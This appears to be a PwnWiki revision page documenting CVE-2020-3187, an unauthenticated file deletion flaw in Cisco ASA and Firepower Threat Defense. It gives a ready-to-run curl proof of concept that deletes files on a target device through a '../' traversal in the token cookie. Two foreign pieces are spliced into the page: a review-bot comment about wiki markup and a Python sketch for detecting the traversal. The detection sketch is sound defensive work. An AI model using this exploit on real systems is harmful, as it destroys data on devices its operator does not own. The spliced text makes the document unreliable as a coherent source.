Difference between revisions of "Cisco Unauthenticated Arbitrary File Deletion Vulnerability CVE-2020-3187"
From PwnWiki
(Created new page with content "==Affected systems:== Cisco Adaptive Security Appliance <br> Cisco Firepower Threat Defense Software ==POC:== Example: deleting the logo file: payload: <br> <code>/+C…") |
(→More:) |
| Line 18: | Line 18: | ||
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/ <br> | https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/ <br> | ||
https://twitter.com/aboul3la/status/1286809567989575685 | https://twitter.com/aboul3la/status/1286809567989575685 | ||
| + | https://github.com/pry0cc/CVE-2020-3187 | ||
| + | https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html | ||
</blockquote> | </blockquote> | ||
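Review bot: the two added reference lines (the GitHub and Packet Storm links) have no trailing <br>, and neither does the Twitter line they follow, while the Rapid7 entry above ends with one, so nothing in the markup separates the last three links. Append <br> to the Twitter and GitHub lines so each reference sits on its own line like the Rapid7 entry.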
Latest revision as of 14:48, 14 April 2021
Affected systems:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
Example: deleting the logo file:
payload:
/+CSCOU+/csco_logo.gif
Run:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
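A detection-side sketch for the request shown above, added here as an example and not taken from the wiki page or from Cisco: it flags requests to `/+CSCOE+/session_password.html` whose `token` cookie contains a directory-traversal sequence. It assumes raw HTTP request heads are available to the defender (for example from a TLS-terminating proxy or a capture); the host `asa.example`, the sample requests and the percent-decoding step are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Path requested by the PoC on this page; the traversal rides in the "token" cookie.
TARGET_PATH = "/+CSCOE+/session_password.html"
TRAVERSAL = re.compile(r"\.\.[/\\]")

# Constructed sample requests (not real traffic).
REQ = "GET {} HTTP/1.1\r\nHost: asa.example\r\nCookie: {}\r\n\r\n"
SAMPLES = {
    "poc": REQ.format(TARGET_PATH, "token=../+CSCOU+/csco_logo.gif"),
    "encoded": REQ.format(TARGET_PATH, "a=1; token=%2e%2e%2f+CSCOU+%2fcsco_logo.gif"),
    "benign": REQ.format(TARGET_PATH, "token=3f9ac2d17b"),
    "other_path": REQ.format("/index.html", "token=../x"),
}

def parse_request_head(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers)."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, target, _ = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, target.split("?", 1)[0], headers

def token_values(headers):
    """Yield each value of a cookie named 'token' from all Cookie headers."""
    for header in headers.get("cookie", []):
        for pair in header.split(";"):
            name, _, value = pair.strip().partition("=")
            if name.strip().lower() == "token":
                yield value.strip().strip('"')

def is_suspicious(raw):
    """True if a request to TARGET_PATH carries '../' or '..\\' in its token cookie."""
    try:
        _, path, headers = parse_request_head(raw)
    except ValueError:
        return False
    if unquote(path).lower() != TARGET_PATH.lower():
        return False
    # Decode twice so single- and double-percent-encoded sequences are also caught
    # (a conservative assumption; the page only shows the literal "../" form).
    return any(TRAVERSAL.search(unquote(unquote(v))) for v in token_values(headers))
```
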
More:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
https://github.com/pry0cc/CVE-2020-3187
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html